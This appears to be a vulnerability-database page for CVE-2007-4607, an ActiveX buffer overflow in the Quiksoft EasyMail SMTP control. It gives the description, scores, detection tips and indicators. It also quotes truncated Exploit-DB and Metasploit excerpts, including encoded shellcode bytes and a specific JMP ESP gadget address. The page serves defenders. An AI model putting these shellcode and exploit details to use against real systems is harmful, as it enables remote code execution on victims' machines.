CVE-2007-4607
published 2007-08-31CVE-2007-4607: Buffer overflow in the EasyMailSMTPObj ActiveX control in emsmtp.dll 6.0.1 in the Quiksoft EasyMail SMTP Object, as used in Postcast Server Pro 3.0.61 and…
PriorityP351critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
56.38%
98.9th percentile
Buffer overflow in the EasyMailSMTPObj ActiveX control in emsmtp.dll 6.0.1 in the Quiksoft EasyMail SMTP Object, as used in Postcast Server Pro 3.0.61 and other products, allows remote attackers to execute arbitrary code via a long argument to the SubmitToExpress method, a different vulnerability than CVE-2007-1029. NOTE: this may have been fixed in version 6.0.3.15.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gate_comm_software | postcast_server_pro | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36
- →Detect instantiation of the vulnerable ActiveX control by its ProgID 'EasyMail.SMTP.6' or CLSID '68AC0D5F-0424-11D5-822F-00C04F6BA8D9' in browser/script contexts. ↗
- →Alert on calls to the 'SubmitToExpress' method of the EasyMailSMTPObj ActiveX control with an argument length exceeding normal bounds (PoC uses 539+ 'A' characters plus shellcode). ↗
- →Detect heap spray targeting address 0x0a0a0a0a with large allocation (0x40000) in JavaScript, a pattern used by the Metasploit module for this CVE. ↗
- →Monitor for presence of emsmtp.dll version 6.0.1 loaded in browser processes (iexplore.exe); versions prior to 6.0.3.15 are considered vulnerable. ↗
- →The exploit uses a JMP ESP gadget at 0x7E412C78 in user32.dll; detect stack pivots or return-address overwrites pointing to this address on Windows XP/Vista targets. ↗
- ·The JMP ESP ROP gadget address (0x7E412C78 in user32.dll) is specific to Windows XP SP0-SP3 and Windows Vista with IE 6.0 SP0-SP2 / IE 7; it will differ on other OS/patch levels. ↗
- ·The vulnerability may have been silently patched in emsmtp.dll version 6.0.3.15; detections targeting the DLL version should account for this boundary. ↗
- ·The Metasploit module applies JavaScript obfuscation (ObfuscateJS) to variable names and shellcode, so static string-based signatures on variable names will have low reliability. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Oracle Document Capture 10g - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2007-4607 Oracle Document Capture 10g - ActiveX Control Buffer Overflow (Metasploit)
Oracle Document Capture 10g - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: oracle_dc_submittoexpress.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Oracle Document Capture 10g ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0).
Oracle Document Capture 10g comes bundled with a third party ActiveX control
emsmtp.dll (6.0.1.0). When passing a overly long string to the method "SubmitToExpress"
an attac
Exploit-DB
Postcast Server Pro 3.0.61 / Quiksoft EasyMail - 'emsmtp.dll 6.0.1' Remote Buffer Overflow
exploitdb·2007-08-28
CVE-2007-4607 Postcast Server Pro 3.0.61 / Quiksoft EasyMail - 'emsmtp.dll 6.0.1' Remote Buffer Overflow
Postcast Server Pro 3.0.61 / Quiksoft EasyMail - 'emsmtp.dll 6.0.1' Remote Buffer Overflow
---
'open calc.exe
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
unescape("%46%4f%4b%53%46%35%
Metasploit
Oracle Document Capture 10g ActiveX Control Buffer Overflow
metasploit
Oracle Document Capture 10g ActiveX Control Buffer Overflow
Oracle Document Capture 10g ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0). Oracle Document Capture 10g comes bundled with a third party ActiveX control emsmtp.dll (6.0.1.0). When passing an overly long string to the method "SubmitToExpress" an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2013-04/0220.htmlhttp://osvdb.org/38335http://retrogod.altervista.org/postcast-emsmtp_bof.htmlhttp://secunia.com/advisories/24199http://secunia.com/advisories/26639http://www.kb.cert.org/vuls/id/281977http://www.securityfocus.com/bid/25467https://community.ivanti.com/docs/DOC-50988https://exchange.xforce.ibmcloud.com/vulnerabilities/36307https://www.exploit-db.com/exploits/4328http://archives.neohapsis.com/archives/bugtraq/2013-04/0220.htmlhttp://osvdb.org/38335http://retrogod.altervista.org/postcast-emsmtp_bof.htmlhttp://secunia.com/advisories/24199http://secunia.com/advisories/26639http://www.kb.cert.org/vuls/id/281977http://www.securityfocus.com/bid/25467https://community.ivanti.com/docs/DOC-50988https://exchange.xforce.ibmcloud.com/vulnerabilities/36307https://www.exploit-db.com/exploits/4328
2007-08-31
Published